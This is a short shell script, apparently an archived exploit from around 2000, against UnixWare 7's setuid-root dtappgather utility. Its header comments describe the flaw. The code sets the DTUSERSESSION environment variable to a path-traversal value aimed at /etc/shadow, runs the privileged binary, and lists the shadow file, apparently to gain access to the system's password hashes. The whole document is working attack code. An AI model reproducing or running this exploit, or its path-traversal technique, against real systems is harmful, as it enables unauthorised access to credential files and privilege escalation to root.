#!/bin/sh
#
#   UnixWare 7's dtappgather
#   Discovered by: K2 (ktwo@ktwo.ca)
#
# UnixWare 7's  dtappgather  runs  with  superuser
# privileges,  but improperly check $DTUSERSESSION
# to ensure that the file is readable/writeable or
# owned by the user running it.

export DTUSERSESSION=../../../../etc/shadow
cd /usr/dt/bin
./dtappgather
ls -la /etc/shadow

#                 www.hack.co.za           [2000]#